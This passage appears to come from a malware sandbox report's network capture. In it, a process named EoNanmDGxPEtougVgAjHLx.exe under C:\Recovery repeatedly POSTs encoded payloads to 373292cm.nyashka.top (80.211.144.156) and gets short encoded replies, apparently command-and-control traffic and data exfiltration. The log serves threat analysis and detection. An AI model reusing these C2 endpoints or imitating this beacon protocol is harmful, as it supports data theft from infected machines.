                                    Data Ascii: ZQ\RQDQ[[_ZQYRX^W\]ZW[SX\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,33A#>$4V9])>4?>-[)=Z +P '?9373);.&F$.Y/1
                                    Aug 25, 2024 15:44:14.814344883 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:14.943761110 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    52192.168.2.64977880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:15.080034971 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:15.435611010 CEST2516OUTData Raw: 5f 54 5c 57 54 47 54 58 5b 5f 5a 51 59 50 58 5f 57 58 5d 5f 57 5d 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _T\WTGTX[_ZQYPX_WX]_W]SZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V./+6-]7+.3?=5Z(#]4#P41/(Y##=\,&F$.Y/
                                    Aug 25, 2024 15:44:15.750068903 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:15.882800102 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    53192.168.2.64977980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:16.633265972 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:16.982475042 CEST2516OUTData Raw: 5f 56 59 50 54 45 54 5f 5b 5f 5a 51 59 52 58 53 57 5d 5d 5f 57 50 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _VYPTET_[_ZQYRXSW]]_WPS\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V..3?D"3#0")><\<)<8#!1;<;]#36/>&F$.Y/1
                                    Aug 25, 2024 15:44:17.338368893 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:17.471532106 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:16 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    54192.168.2.64978080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:17.596431017 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    55192.168.2.64978180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:17.895472050 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:18.247993946 CEST1840OUTData Raw: 5f 57 5c 53 51 42 54 59 5b 5f 5a 51 59 55 58 50 57 5d 5d 58 57 5a 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _W\SQBTY[_ZQYUXPW]]XWZS\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,3!.( 3"*.0]<>]?['\7,W78S*)$"#5X;.&F$.Y/-
                                    Aug 25, 2024 15:44:18.577860117 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:18.782084942 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 53 28 36 29 05 25 05 2c 50 24 0d 0f 0b 3e 03 05 10 2a 03 36 01 25 28 2d 5e 27 3d 27 0c 33 05 03 5b 28 10 26 52 26 2c 23 5c 39 0e 2b 5d 0c 13 21 07 23 3a 0f 04 26 12 20 5c 2a 06 23 5a 22 5a 26 13 28 29 35 50 3f 01 0d 00 3e 3a 3b 11 3f 3a 2e 11 2f 28 25 5e 2e 33 2e 1d 20 3e 2b 52 0d 11 24 57 29 3d 3d 55 28 3d 28 01 35 06 06 07 24 03 00 1e 24 22 00 1d 26 29 0e 5b 26 0b 36 0d 30 31 0b 50 24 38 2e 13 26 2c 21 54 23 32 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &S(6)%,P$>*6%(-^'='3[(&R&,#\9+]!#:& \*#Z"Z&()5P?>:;?:./(%^.3. >+R$W)==U(=(5$$"&)[&601P$8.&,!T#2#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    56192.168.2.64978280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:18.015693903 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:18.373075962 CEST2516OUTData Raw: 5f 56 59 57 54 44 51 5e 5b 5f 5a 51 59 56 58 5e 57 50 5d 52 57 5f 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _VYWTDQ^[_ZQYVX^WP]RW_S]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.].3'B"- \7 +-<>6+' ##(_77 &;>&F$.Y/!
                                    Aug 25, 2024 15:44:18.687629938 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:18.889750004 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    57192.168.2.64978380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:19.081146955 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:19.435446978 CEST2516OUTData Raw: 5f 55 59 54 54 42 51 5e 5b 5f 5a 51 59 50 58 55 57 5f 5d 5b 57 51 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _UYTTBQ^[_ZQYPXUW_][WQS^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^8?B5>?#))>4Y<-![+#/<7#<$ 8&F$.Y/
                                    Aug 25, 2024 15:44:19.772803068 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:19.976860046 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:19 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    58192.168.2.64978480.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:20.113158941 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:20.466770887 CEST2516OUTData Raw: 5a 51 5c 5f 54 40 51 5c 5b 5f 5a 51 59 53 58 50 57 5f 5d 5d 57 59 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\_T@Q\[_ZQYSXPW_]]WYS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-830#> ^40])-'<X!^+=7<+S#2<+)7 5]/>&F$.Y/5
                                    Aug 25, 2024 15:44:20.789216995 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:20.918942928 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    59192.168.2.64978580.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:21.047178984 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:21.422295094 CEST2516OUTData Raw: 5a 56 5c 55 51 47 51 5c 5b 5f 5a 51 59 52 58 53 57 5e 5d 53 57 59 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZV\UQGQ\[_ZQYRXSW^]SWYS_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/#6>+7)+-7?)+[7[#?#S 1#<:(# /&F$.Y/1
                                    Aug 25, 2024 15:44:21.716005087 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:21.921788931 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:21 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    60192.168.2.64978780.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:22.047396898 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:22.404309034 CEST2516OUTData Raw: 5a 50 59 55 51 44 54 5b 5b 5f 5a 51 59 54 58 56 57 5e 5d 58 57 50 53 54 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZPYUQDT[[_ZQYTXVW^]XWPST\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.;#C5=<#>=7((-7 7#!**8"0\,>&F$.Y/)
                                    Aug 25, 2024 15:44:22.712323904 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:22.953212023 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:22 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    61192.168.2.64978880.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:23.082521915 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:23.435571909 CEST2516OUTData Raw: 5a 57 5c 57 51 42 54 5d 5b 5f 5a 51 59 5f 58 53 57 5a 5d 5d 57 5a 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZW\WQBT][_ZQY_XSWZ]]WZS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/+B![( 0)\)>7<9]<>#]"<!!/(:?^#!X8&F$.Y/
                                    Aug 25, 2024 15:44:23.747426987 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:23.878122091 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:23 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    62192.168.2.64978980.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:23.892472982 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:24.248004913 CEST1820OUTData Raw: 5f 50 59 52 51 45 54 5d 5b 5f 5a 51 59 5e 58 55 57 5b 5d 5f 57 5c 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _PYRQET][_ZQY^XUW[]_W\SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y83!(]" =[0(X&<?Z /4 (#428&F$.Y/
                                    Aug 25, 2024 15:44:24.589941978 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:24.721812963 CEST308INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 55 3d 26 29 04 25 15 2c 52 24 23 25 0b 2a 13 34 02 29 2e 29 58 24 01 36 01 27 3e 2f 0e 30 5d 2a 04 2b 10 2d 0b 26 3f 2f 5b 3a 34 2b 5d 0c 13 21 00 20 39 32 5b 24 3f 28 1e 29 06 2f 5a 21 12 3d 03 2b 2a 35 53 3f 11 28 58 3c 17 3b 11 3f 2a 0b 0f 38 06 21 16 2e 1e 3a 51 20 04 2b 52 0d 11 24 57 28 13 21 55 3e 3e 15 5c 21 16 3f 59 30 13 2d 09 24 22 2d 0b 26 39 02 11 25 21 29 56 27 08 3a 09 32 3b 3e 5a 32 3f 0f 54 36 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &U=&)%,R$#%*4).)X$6'>/0]*+-&?/[:4+]! 92[$?()/Z!=+*5S?(X<;?*8!.:Q +R$W(!U>>\!?Y0-$"-&9%!)V':2;>Z2?T6#T,"W3UV


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    63192.168.2.64979080.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:24.058505058 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:24.404500961 CEST2516OUTData Raw: 5f 54 59 57 54 44 54 5d 5b 5f 5a 51 59 5f 58 54 57 5c 5d 59 57 5b 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _TYWTDT][_ZQY_XTW\]YW[S_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.],3?B![+ V!>='>>-<7\4<+P!1<($##9/&F$.Y/
                                    Aug 25, 2024 15:44:24.704689026 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:24.838546038 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:24 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    64192.168.2.64979180.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:24.970091105 CEST269OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:25.326481104 CEST2512OUTData Raw: 5f 50 59 55 54 45 54 5e 5b 5f 5a 51 59 57 58 56 57 5e 5d 58 57 5c 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _PYUTET^[_ZQYWXVW^]XW\S[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V./06.+"0>$(9)=8 /#!1(P(7^7 )X,&F$.Y/!
                                    Aug 25, 2024 15:44:25.659655094 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:25.770919085 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:25 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    65192.168.2.64979280.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:25.960104942 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:26.317755938 CEST2516OUTData Raw: 5f 56 59 54 51 42 54 50 5b 5f 5a 51 59 56 58 57 57 58 5d 5e 57 5e 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _VYTQBTP[_ZQYVXWWX]^W^SZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-; #6.(X#9Y*-<<:?(4Q!" P*)\73:8&F$.Y/!
                                    Aug 25, 2024 15:44:26.646017075 CEST25INHTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:26.775768042 CEST158INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    66192.168.2.64979380.211.144.156806244C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 25, 2024 15:44:26.923351049 CEST293OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
